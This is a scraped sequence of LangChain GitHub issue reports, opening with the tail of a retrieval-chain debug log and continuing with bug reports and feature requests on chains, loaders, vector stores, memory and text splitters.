"Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.\n\nEnter Hamlet.\n\nEnter Hamlet.\n\nEnter Hamlet.\n\nHaply the seas, and countries different,\n With variable objects, shall expel\n This something-settled matter in his heart,\n Whereon his brains still beating puts him thus\n From fashion of himself. What think you on't?\n Pol. It shall do well. But yet do I believe\n The origin and commencement of his grief\n Sprung from neglected love.- How now, Ophelia?\n You need not tell us what Lord Hamlet said.\n We heard it all.- My lord, do as you please;\n\nQuestion: Should Hamlet end his life?\nHelpful Answer:"
]
}
llama_print_timings: load time = 1100.49 ms
llama_print_timings: sample time = 13.20 ms / 17 runs ( 0.78 ms per token)
llama_print_timings: prompt eval time = 1100.33 ms / 208 tokens ( 5.29 ms per token)
llama_print_timings: eval time = 1097.70 ms / 16 runs ( 68.61 ms per token)
llama_print_timings: total time = 2270.30 ms
[llm/end] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain > 4:chain:LLMChain > 5:llm:LlamaCpp] [2.27s] Exiting LLM run with output:
{
"generations": [
[
{
"text": " I'm sorry, I don't know the answer to that question.",
"generation_info": null
}
]
],
"llm_output": null,
"run": null
}
[chain/end] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain > 4:chain:LLMChain] [2.27s] Exiting Chain run with output:
{
"text": " I'm sorry, I don't know the answer to that question."
}
[chain/end] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain] [2.27s] Exiting Chain run with output:
{
"output_text": " I'm sorry, I don't know the answer to that question."
}
[chain/end] [1:chain:ConversationalRetrievalChain] [5.41s] Exiting Chain run with output:
{
"answer": " I'm sorry, I don't know the answer to that question."
}
> Answer: I'm sorry, I don't know the answer to that question.
```
### Expected behavior
I expect the `on_retriever_end()` callback to be called immediately after documents are retrieved. I'm not sure what I'm doing wrong. | on_retriever_end() not called with ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7290/comments | 12 | 2023-07-06T16:51:42Z | 2024-04-25T16:11:49Z | https://github.com/langchain-ai/langchain/issues/7290 | 1,791,902,494 | 7,290 |
[
"langchain-ai",
"langchain"
] | ### System Info
Mac OS Ventura 13.3.1 (a)
Python 3.10.8
LangChain 0.0.224
### Who can help?
@hwchase17
@hinthornw
### Information
- [ ] The official example notebooks/scripts
- [x] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Reproduction Steps:
1. Run the following
```
from langchain.llms import OpenAI
from langchain.indexes import GraphIndexCreator
from langchain.chains import GraphQAChain
from langchain.prompts import PromptTemplate
text = "Apple announced the Vision Pro in 2023."
index_creator = GraphIndexCreator(llm=OpenAI(openai_api_key='{OPEN_AI_KEY_HERE}', temperature=0))
graph = index_creator.from_text(text)
chain = GraphQAChain.from_llm(
    OpenAI(temperature=0, openai_api_key='{OPEN_AI_KEY_HERE}'),
    graph=graph,
    verbose=True
)
chain.run("When did Apple announce the Vision Pro?")
```
2. Observe the "Full Context" output in your terminal and notice that the two triplets are concatenated onto a single line with no spacing in between them.
I believe the issue is in the code [here](https://github.com/hwchase17/langchain/blob/681f2678a357268c435c18f19323ccb50cac079c/langchain/chains/graph_qa/base.py#L80). When only 1 triplet is found in an iteration, `.join` does not add any `\n` characters, resulting in a context string with no separation between triplets.
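A minimal illustration of the suspected behavior: `"\n".join` over a single-element list inserts no separator, so when per-iteration results are later fused together, nothing ends up between the triplets.

```python
# join() only inserts the separator *between* elements, so a one-element
# list comes back unchanged -- no trailing or leading newline.
single = "\n".join(["Apple announced Vision Pro"])
multi = "\n".join(["Apple announced Vision Pro", "Vision Pro was announced in 2023"])

print(repr(single))  # 'Apple announced Vision Pro'
print(repr(multi))   # 'Apple announced Vision Pro\nVision Pro was announced in 2023'
```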
### Expected behavior
Expected: A multi-line string with each triplet text on its own line (delimited by `"\n"`)
In the above repro steps, I would expect
```
Full Context:
Apple announced Vision Pro
Vision Pro was announced in 2023
``` | Input in GraphQAChain Prompt is Malformed When Only 1 Triplet Is Found | https://api.github.com/repos/langchain-ai/langchain/issues/7289/comments | 2 | 2023-07-06T16:25:05Z | 2023-07-07T21:19:54Z | https://github.com/langchain-ai/langchain/issues/7289 | 1,791,868,997 | 7,289 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
If we run a `Search` on python.langchain.com/docs/, we get the results as several clickable fields. Those fields are the URLs of the found results, but the fields are too short to show the URLs, so we cannot see which LangChain doc pages were found. We see just the start of the URL string, like `1. python.langchain.com/docs/module...` Every result field shows the same truncated text, which is useless.

### Idea or request for content:
Several ideas on how to fix it:
1. make the result fields longer and place them one after another in the list.
2. show the last part of the URL string not the start of the URL string. | DOC: Search functionality: `Verified Sources:` fields unreadable | https://api.github.com/repos/langchain-ai/langchain/issues/7288/comments | 1 | 2023-07-06T16:17:48Z | 2023-10-05T22:06:37Z | https://github.com/langchain-ai/langchain/issues/7288 | 1,791,859,217 | 7,288 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain 0.0.223
Linux
Python 3.11
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Something like this:
```python
chat_history = PostgresChatMessageHistory(  # Just a slight mod of the postgres class for sorting the results by date
    connection_string=config('SUPABASE_POSTGRES_CONNECT_STRING'),
    session_id="58964243-23cd-41fe-ad05-ecbfd2a73202",  # str(uuid.uuid4()),
    table_name="chat_history"
)

memory = ConversationBufferMemory(
    memory_key="chat_history",
    chat_memory=chat_history,
    return_messages=True,
    human_prefix="USER",  # This doesn't work.
    ai_prefix="ASSISTANT",  # This doesn't work.
)

agent = ChatAgent(
    name="Chat Assistant",
    tools=_tools,
    agent_type=AgentType.OPENAI_MULTI_FUNCTIONS,
    llm=openai
)
```
If I look at what was prompted and in postgres, it always shows "Human" and "AI"
### Expected behavior
I expect USER and ASSISTANT to be used everywhere after I set it. I see this as especially important when using openai's chat endpoint since their models were trained using these tokens.
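To make the expectation concrete, here is a toy rendering (not langchain's actual implementation) of what the string buffer should look like once the prefixes are honored:

```python
def render(history, human_prefix="Human", ai_prefix="AI"):
    """Render (role, text) pairs the way a string chat buffer would."""
    prefixes = {"human": human_prefix, "ai": ai_prefix}
    return "\n".join(f"{prefixes[role]}: {text}" for role, text in history)

transcript = render(
    [("human", "hello"), ("ai", "hi there")],
    human_prefix="USER",
    ai_prefix="ASSISTANT",
)
print(transcript)
# USER: hello
# ASSISTANT: hi there
```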
I also think it would be better to load the memory/chat history as the openai API provides parameters for (As a list of messages) instead of in the SYSTEM message, but perhaps that's for another issue. | Can't use human_prefix and ai_prefix with agent | https://api.github.com/repos/langchain-ai/langchain/issues/7285/comments | 3 | 2023-07-06T15:57:25Z | 2024-04-01T11:21:35Z | https://github.com/langchain-ai/langchain/issues/7285 | 1,791,828,808 | 7,285 |
[
"langchain-ai",
"langchain"
] | ### System Info
When I initialise `ChatAnthropic()`, I get this error:

```
anthropic_version = packaging.version.parse(version("anthropic"))
AttributeError: module 'packaging' has no attribute 'version'
```
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.chat_models import ChatOpenAI, ChatAnthropic
llm = ChatAnthropic()
```
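For what it's worth, one likely cause (an assumption on my part, not a confirmed diagnosis): `packaging.version` is a submodule, and it is not guaranteed to be reachable as an attribute of `packaging` unless something has explicitly imported it.

```python
import packaging

# `import packaging` alone does not necessarily bind the `version` submodule
# as an attribute of the package; an explicit submodule import always works:
import packaging.version

v = packaging.version.parse("0.3.0")
print(v.release)  # (0, 3, 0)
```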
### Expected behavior
As shown above. | anthropic_version = packaging.version.parse(version("anthropic")) AttributeError: module 'packaging' has no attribute 'version' | https://api.github.com/repos/langchain-ai/langchain/issues/7283/comments | 5 | 2023-07-06T15:35:39Z | 2023-10-14T20:10:57Z | https://github.com/langchain-ai/langchain/issues/7283 | 1,791,794,342 | 7,283 |
[
"langchain-ai",
"langchain"
] | ### System Info
Getting `ValueError: Unable to send PDF to Mathpix` while using MathpixPDFLoader.
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
math_pix_loaded = MathpixPDFLoader(file_path)
load_list_mathpix = math_pix_loaded.load()
```
### Expected behavior
A list of pages to be returned. | MathpixPDFLoader doesn't work. | https://api.github.com/repos/langchain-ai/langchain/issues/7282/comments | 5 | 2023-07-06T15:15:17Z | 2023-10-07T17:05:46Z | https://github.com/langchain-ai/langchain/issues/7282 | 1,791,761,739 | 7,282 |
[
"langchain-ai",
"langchain"
] | ### Feature request
It would be nice to have a function for VertexAI similar to `get_openai_callback()`, which gives the input tokens, output tokens, and cost of using OpenAI models:
```python
with get_openai_callback() as cb:
    llm = OpenAI(temperature=0)
    chat = ChatOpenAI(temperature=0)
    emb = OpenAIEmbeddings()

    output_llm = llm("As I was saying,")
    print(output_llm)

    # System message + Human Message
    messages = [
        SystemMessage(content="You are a helpful assistant that translates English to French."),
        HumanMessage(content="Translate this sentence from English to French. I love programming.")
    ]
    output_chat = chat(messages)
    print(output_chat)

    print(cb)
```
I would like to have:
```python
with get_vertexai_callback() as cb:
    llm = VertexAI(temperature=0)
    chat = ChatVertexAI(temperature=0)
    emb = VertexAIEmbeddings()

    print(llm("As I was saying,"))

    # System message + Human Message
    messages = [
        SystemMessage(content="You are a helpful assistant that translates English to French."),
        HumanMessage(content="Translate this sentence from English to French. I love programming.")
    ]
    print(chat(messages))
```
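Independent of the Vertex-specific plumbing, the general shape of such a helper might look like this (all names are hypothetical; real token counts would have to be fed in from an `on_llm_end` callback handler):

```python
from contextlib import contextmanager
from dataclasses import dataclass


@dataclass
class UsageTracker:
    """Accumulates token usage reported by LLM callbacks."""
    prompt_tokens: int = 0
    completion_tokens: int = 0
    successful_requests: int = 0

    @property
    def total_tokens(self) -> int:
        return self.prompt_tokens + self.completion_tokens

    def record(self, prompt_tokens: int, completion_tokens: int) -> None:
        self.prompt_tokens += prompt_tokens
        self.completion_tokens += completion_tokens
        self.successful_requests += 1


@contextmanager
def get_vertexai_callback():  # hypothetical name mirroring get_openai_callback
    tracker = UsageTracker()
    # A real implementation would register a callback handler here whose
    # on_llm_end hook calls tracker.record(...) with usage from each response,
    # and unregister it on exit.
    yield tracker
```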
### Motivation
I would like to monitor my usage of VertexAI models
### Your contribution
I have already read through the OpenAI version of the callback quite a bit, but if anyone has already thought about how to do it with Vertex I would be really curious :). If someone else is also planning to do it, we could merge efforts! | Callback for VertexAI to monitor cost and token consumption | https://api.github.com/repos/langchain-ai/langchain/issues/7280/comments | 8 | 2023-07-06T14:50:29Z | 2024-06-05T10:48:30Z | https://github.com/langchain-ai/langchain/issues/7280 | 1,791,718,932 | 7,280 |
[
"langchain-ai",
"langchain"
] | You can pass a filter to a kNN query in Elasticsearch.
This is currently implemented in the langchain wrapper for the exact kNN search, but it is not yet implemented for the approximate kNN search.
Add filter param to [_default_knn_query](https://github.com/jeffvestal/langchain/blob/10f34bf62e2d53f0b1a7b15ba21c2328b64862cd/langchain/vectorstores/elastic_vector_search.py#L398), [knn_search](https://github.com/jeffvestal/langchain/blob/10f34bf62e2d53f0b1a7b15ba21c2328b64862cd/langchain/vectorstores/elastic_vector_search.py#L432), [knn_hybrid_search](https://github.com/jeffvestal/langchain/blob/10f34bf62e2d53f0b1a7b15ba21c2328b64862cd/langchain/vectorstores/elastic_vector_search.py#L488).
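For reference, the target Elasticsearch request shape is an approximate kNN search with a `filter` clause inside the `knn` section (field names and values below are placeholders):

```json
{
  "knn": {
    "field": "vector",
    "query_vector": [0.12, 0.34, 0.56],
    "k": 10,
    "num_candidates": 100,
    "filter": {
      "term": { "metadata.author": "jane" }
    }
  }
}
```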
cc: @jeffvestal, @derickson
### Suggestion:
_No response_ | Allow filter to be passed in ElasticKnnSearch knn_search and knn_hybrid_search | https://api.github.com/repos/langchain-ai/langchain/issues/7277/comments | 1 | 2023-07-06T13:56:39Z | 2023-09-20T14:35:44Z | https://github.com/langchain-ai/langchain/issues/7277 | 1,791,621,321 | 7,277 |
[
"langchain-ai",
"langchain"
] | ### Feature request
This adds support for Apache SOLRs vector search capabilities
(https://solr.apache.org/guide/solr/latest/query-guide/dense-vector-search.html)
### Motivation
As SOLR is a commonly used search index and now offers this feature, it is important to allow SOLR users to be able to integrate seamlessly with LangChain (and the associated benefits).
### Your contribution
I can try submitting a PR | [FEATURE] SOLR Based Vector Store | https://api.github.com/repos/langchain-ai/langchain/issues/7273/comments | 8 | 2023-07-06T12:44:39Z | 2024-02-15T16:11:20Z | https://github.com/langchain-ai/langchain/issues/7273 | 1,791,490,032 | 7,273 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
```
def handle_embeddings(payload):
    loader = UnstructuredPDFLoader(payload["filepath"])
    documents = loader.load()
    text_splitter = SpacyTextSplitter(pipeline=payload["language"], chunk_size=1536, chunk_overlap=0)
    docs = text_splitter.split_documents(documents)
    embeddings = OpenAIEmbeddings(**payload)
    qdrant = Qdrant.from_documents(
        docs, embeddings,
        path=path,
        collection_name=collection_name,
    )


import dramatiq
from dramatiq.brokers.redis import RedisBroker
from tasks import handle_embeddings

redis_broker = RedisBroker(url='redis://redis.helloreader.docker/10')
dramatiq.set_broker(redis_broker)


@dramatiq.actor(max_retries=0)
def handle_embeddings_task(payload):
    result = handle_embeddings(payload)
    return result
```
Due to the time-consuming nature of embeddings and storing them in a vector database, I opted for asynchronous queue tasks to handle them. However, I noticed that when processing documents of size 30 MB, the memory usage of the queue task kept increasing until it eventually crashed due to overflow. At this point, I investigated and found that the memory overflow occurred even before the embeddings interface was called, indicating that the issue was with the `Qdrant.from_documents` method. I have been searching for the root cause for a while but haven't found it yet.
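One thing worth trying (an assumption, not a confirmed fix): build the store incrementally in small batches instead of a single `Qdrant.from_documents` call over everything, so intermediate buffers can be released between batches. The helper below is plain Python; the Qdrant calls sketched in the comments are the intended, untested usage.

```python
def batched(items, batch_size):
    """Yield successive fixed-size slices of a list."""
    for start in range(0, len(items), batch_size):
        yield items[start:start + batch_size]

# Hypothetical usage against the code above:
#   chunks = list(batched(docs, 64))
#   qdrant = Qdrant.from_documents(chunks[0], embeddings, path=path,
#                                  collection_name=collection_name)
#   for chunk in chunks[1:]:
#       qdrant.add_documents(chunk)
```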
### Suggestion:
I hope someone who is familiar with the `Qdrant.from_documents` method or has knowledge of other possible causes can help me resolve this issue.
The document size of approximately 30 MB corresponds to approximately 560,000 tokens.
During the process, I tried using Dramatiq, Celery, and RQ, and encountered the same issue with all of them. Therefore, we can exclude the possibility of the issue being specific to these queue tools. | 'Qdrant.from_documents' Memory overflow | https://api.github.com/repos/langchain-ai/langchain/issues/7272/comments | 8 | 2023-07-06T12:25:00Z | 2023-10-16T16:06:24Z | https://github.com/langchain-ai/langchain/issues/7272 | 1,791,458,701 | 7,272 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I am using Tools and Agents to query different vectorstores. But when I ask a question that is not covered by the vectorstore, it responds "I don't know." Is there any approach I can try where, if the answer is not in the vectorstore, I can carry on the conversation like ChatGPT? If yes, can you please let me know how to integrate this?
### Suggestion:
_No response_ | Langchain Tools and Agents | https://api.github.com/repos/langchain-ai/langchain/issues/7269/comments | 5 | 2023-07-06T10:11:15Z | 2023-12-01T16:09:13Z | https://github.com/langchain-ai/langchain/issues/7269 | 1,791,243,008 | 7,269 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain v0.0.225, Windows10, Python 3.10
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
An example taken from langchain is as follows:
```python
from langchain import PromptTemplate, LLMChain
from langchain.llms import GPT4All
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler

template = """Question: {question}
Answer: Let's think step by step."""
prompt = PromptTemplate(template=template, input_variables=["question"])
local_path = (
    "ggml-gpt4all-j-v1.3-groovy.bin"  # replace with your desired local file path
)
callbacks = [StreamingStdOutCallbackHandler()]
llm = GPT4All(model=local_path, callbacks=callbacks, verbose=True)
llm_chain = LLMChain(prompt=prompt, llm=llm)
question = "What NFL team won the Super Bowl in the year Justin Bieber was born?"
llm_chain.run(question)
```
The execution result is as follows:

```
TypeError: GPT4All.generate() got an unexpected keyword argument 'n_ctx'
```

When I add the parameter `max_tokens=200`, i.e. `llm = GPT4All(model=local_path, max_tokens=200, callbacks=callbacks, verbose=True)`, the following result appears:

```
ValidationError: 1 validation error for GPT4All
max_tokens
  extra fields not permitted (type=value_error.extra)
```
### Expected behavior
```python
callbacks = [StreamingStdOutCallbackHandler()]
llm = GPT4All(model=local_path, max_tokens=200, callbacks=callbacks, verbose=True)
llm_chain = LLMChain(prompt=prompt, llm=llm)
question = "What NFL team won the Super Bowl in the year Justin Bieber was born?"
llm_chain.run(question)
# should output the correct result
``` | langchain + gpt4all execution error, keeps reporting parameter problems | https://api.github.com/repos/langchain-ai/langchain/issues/7268/comments | 3 | 2023-07-06T09:22:31Z | 2023-10-14T20:11:07Z | https://github.com/langchain-ai/langchain/issues/7268 | 1,791,159,677 | 7,268 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain v0.0.225, Windows, Python 3.10
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
The behavior of `CharacterTextSplitter` when changing `keep_separator` with normal characters is like this:
```python
text_splitter = CharacterTextSplitter(
    chunk_size=4,
    chunk_overlap=0,
    separator="_",
    keep_separator=False,
)
text_splitter.split_text("foo_bar_baz_123")
# ['foo', 'bar', 'baz', '123']
```
```python
text_splitter = CharacterTextSplitter(
    chunk_size=4,
    chunk_overlap=0,
    separator="_",
    keep_separator=True,
)
text_splitter.split_text("foo_bar_baz_123")
# ['foo', '_bar', '_baz', '_123']
```
However, when using special regex characters like `.` or `*`, the splitter breaks when `keep_separator` is `False`.
```python
text_splitter = CharacterTextSplitter(
    chunk_size=4,
    chunk_overlap=0,
    separator=r"\.",
    keep_separator=False,
)
text_splitter.split_text("foo.bar.baz.123")
# ['foo.bar.baz.123']
```
The special characters should be escaped, otherwise it raises an error. For example, the following code raises an error.
```python
text_splitter = CharacterTextSplitter(
chunk_size=4,
chunk_overlap=0,
separator=r"?",
keep_separator=True,
)
text_splitter.split_text("foo?bar?baz?123")
```
I'll make a PR to fix this.
Also, the documentation never mentions that the separator is treated as a regex — I only found out the hard way, after getting regex errors in one of the `RecursiveTextSplitter` splitters when updating LangChain. I think we should add a note about this in the documentation or the code.
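The root cause can be shown with plain `re`, independent of LangChain — a sketch of why escaping the separator (e.g. via `re.escape`) fixes both failure modes:

```python
import re

text = "foo?bar?baz?123"

# An unescaped "?" is a regex quantifier, so re.split raises re.error:
try:
    re.split(r"?", text)
except re.error as err:
    print("re.error:", err)

# re.escape turns it back into a literal character:
print(re.split(re.escape("?"), text))  # ['foo', 'bar', 'baz', '123']
```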
### Expected behavior
```python
text_splitter = CharacterTextSplitter(
chunk_size=4,
chunk_overlap=0,
separator=r"\.",
keep_separator=False,
)
text_splitter.split_text("foo.bar.baz.123")
# ['foo', 'bar', 'baz', '123']
``` | Inconsistent behavior of `CharacterTextSplitter` when changing `keep_separator` for special regex characters | https://api.github.com/repos/langchain-ai/langchain/issues/7262/comments | 1 | 2023-07-06T07:57:36Z | 2023-07-06T13:54:13Z | https://github.com/langchain-ai/langchain/issues/7262 | 1,791,023,162 | 7,262 |
[
"langchain-ai",
"langchain"
] | ### System Info
Error: Please install chromadb as a dependency with, e.g. `npm install -S chromadb`
at Function.imports (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:160:19)
at processTicksAndRejections (node:internal/process/task_queues:96:5)
at async Chroma.ensureCollection (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:61:42)
at async Chroma.addVectors (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:88:28)
at async Chroma.addDocuments (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:56:9)
at async Function.fromDocuments (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:145:9)
at async add (file:///home/aqib/backend-11/vision/vectorStore/db.js:24:5)
at async run (file:///home/aqib/backend-11/vision/vectorStore/insertDocs.js:6:3)
node:internal/process/promises:279
triggerUncaughtException(err, true /* fromPromise */);
^
**_Got this when I console-logged the error_**
ReferenceError: fetch is not defined
at Object.<anonymous> (/home/aqib/backend-11/vision/node_modules/chromadb/dist/main/generated/runtime.js:17:24)
at Module._compile (node:internal/modules/cjs/loader:1196:14)
at Object.Module._extensions..js (node:internal/modules/cjs/loader:1250:10)
at Module.load (node:internal/modules/cjs/loader:1074:32)
at Function.Module._load (node:internal/modules/cjs/loader:909:12)
at Module.require (node:internal/modules/cjs/loader:1098:19)
at require (node:internal/modules/cjs/helpers:108:18)
at Object.<anonymous> (/home/aqib/backend-11/vision/node_modules/chromadb/dist/main/generated/api.js:17:19)
at Module._compile (node:internal/modules/cjs/loader:1196:14)
at Object.Module._extensions..js (node:internal/modules/cjs/loader:1250:10)
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Call any Chroma method to reproduce this issue
### Expected behavior
It should've inserted the documents | Chroma DB Error | https://api.github.com/repos/langchain-ai/langchain/issues/7260/comments | 11 | 2023-07-06T07:46:56Z | 2024-03-13T19:55:57Z | https://github.com/langchain-ai/langchain/issues/7260 | 1,791,006,392 | 7,260 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I'm using the `OpenAIEmbeddings` object to create embeddings for my list of documents. Although it expects a list of strings, the name `embed_documents` misleadingly suggests that it accepts a list of documents. As a result, passing a list of documents raises `AttributeError`, since `Document` objects do not have a `replace` method.
### Suggestion:
1. Add a `replace` method to `Document` (or)
2. Extend the function `embed_documents` to handle `Document` objects (or)
3. Rename the function to suit handling a list of strings
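Until one of those changes lands, the usual workaround is to unwrap the documents yourself before calling `embed_documents` (a sketch; the `Document` class here is a minimal stand-in for `langchain.schema.Document`):

```python
from dataclasses import dataclass, field

@dataclass
class Document:
    page_content: str
    metadata: dict = field(default_factory=dict)

docs = [Document("hello world"), Document("goodbye world")]

# embed_documents expects List[str], so pass the raw text:
texts = [doc.page_content for doc in docs]
print(texts)  # ['hello world', 'goodbye world']
```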
I will be glad to implement one of them as a first issue! | Issue: confusion about `Document` or string input for `embed_documents` function | https://api.github.com/repos/langchain-ai/langchain/issues/7259/comments | 3 | 2023-07-06T07:32:37Z | 2023-10-05T17:49:36Z | https://github.com/langchain-ai/langchain/issues/7259 | 1,790,985,762 | 7,259 |
[
"langchain-ai",
"langchain"
] | I was using the OpenAI functions agent with custom functions. The custom function (loan eligibility) needs three arguments: state, age, and income.
When I run the agent with the question "how much can I borrow in state CA?", it calls the function directly without asking the user for age and income.
Below is the error:
```
pydantic.error_wrappers.ValidationError: 2 validation errors for LoanEligibilitySchema
age
  field required (type=value_error.missing)
income
  field required (type=value_error.missing)
```
How can I fix this?
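One common mitigation (a sketch of the pattern, not the agent's built-in behavior) is to make the tool's arguments optional and have it return a clarifying question, which the agent can relay to the user instead of crashing on schema validation:

```python
from typing import Optional

def loan_eligibility(state: str, age: Optional[int] = None,
                     income: Optional[float] = None) -> str:
    # Ask for whatever is still missing instead of failing validation.
    missing = [name for name, value in (("age", age), ("income", income)) if value is None]
    if missing:
        return "To estimate eligibility I still need: " + ", ".join(missing)
    return f"Computing eligibility for state={state}, age={age}, income={income}."

print(loan_eligibility("CA"))
print(loan_eligibility("CA", age=30, income=85000.0))
```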
### Suggestion:
_No response_ | OpenAI Functions Agent not asking required parameter value | https://api.github.com/repos/langchain-ai/langchain/issues/7255/comments | 1 | 2023-07-06T06:19:57Z | 2023-10-12T16:06:00Z | https://github.com/langchain-ai/langchain/issues/7255 | 1,790,892,343 | 7,255 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain 0.0.225, Python 3.10, Windows
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I am creating a structured chat agent using an `AgentExecutor.from_agent_and_tools`. I have added a custom variable `new_variable` to `input_variables`, and followed the instructions on how to add memory as per here: https://python.langchain.com/docs/modules/agents/agent_types/structured_chat
```python
def get_agent_executor(llm: ChatOpenAI, tools: list[Tool], chat_history: MessagesPlaceholder,
                       memory: ConversationBufferMemory) -> AgentExecutor:
    input_variables = ["input", "agent_scratchpad", "chat_history", "new_variable"]
    prefix = CUSTOM_PREFIX
    suffix = CUSTOM_SUFFIX
    custom_prompt = StructuredChatAgent.create_prompt(tools, prefix=prefix, suffix=suffix,
                                                      input_variables=input_variables,
                                                      memory_prompts=[chat_history])
    llm_chain = LLMChain(llm=llm, prompt=custom_prompt, verbose=True)
    convo_agent = StructuredChatAgent(llm_chain=llm_chain)
    agent_executor = AgentExecutor.from_agent_and_tools(agent=convo_agent, tools=tools, verbose=True,
                                                        max_iterations=1, memory=memory,
                                                        memory_prompts=[chat_history],
                                                        input_variables=input_variables,
                                                        handle_parsing_errors="Check your output and make sure it is a markdown code snippet of a json blob with a single action!")
    return agent_executor
```
This agent crashes every time at the end of the first iteration:
```
final_outputs: Dict[str, Any] = self.prep_outputs(
self.memory.save_context(inputs, outputs)
input_str, output_str = self._get_input_output(inputs, outputs)
prompt_input_key = get_prompt_input_key(inputs, self.memory_variables)
raise ValueError(f"One input key expected got {prompt_input_keys}")
ValueError: One input key expected got ['example_good_page', 'input']
```
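The failure can be reproduced in isolation. The function below mirrors (my reading of the traceback — treat it as an approximation of `langchain.memory.utils.get_prompt_input_key`) the heuristic that breaks as soon as a second non-memory input variable exists:

```python
def get_prompt_input_key(inputs: dict, memory_variables: list) -> str:
    # Whatever is not a memory variable (or "stop") is assumed to be the
    # single prompt input -- an extra variable makes the guess ambiguous.
    prompt_input_keys = list(set(inputs) - set(memory_variables) - {"stop"})
    if len(prompt_input_keys) != 1:
        raise ValueError(f"One input key expected got {prompt_input_keys}")
    return prompt_input_keys[0]

print(get_prompt_input_key({"input": "hi"}, ["chat_history"]))  # input
try:
    get_prompt_input_key({"input": "hi", "new_variable": "x"}, ["chat_history"])
except ValueError as err:
    print(err)
```

A workaround often suggested is to tell the memory which key to save explicitly, e.g. `ConversationBufferMemory(..., input_key="input")`, so the heuristic above is never consulted.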
### Expected behavior
save_context without hiccup | Structured Chat Agent cannot save_context when memory has additional input variables | https://api.github.com/repos/langchain-ai/langchain/issues/7254/comments | 1 | 2023-07-06T04:49:18Z | 2023-10-12T16:06:05Z | https://github.com/langchain-ai/langchain/issues/7254 | 1,790,798,010 | 7,254 |
[
"langchain-ai",
"langchain"
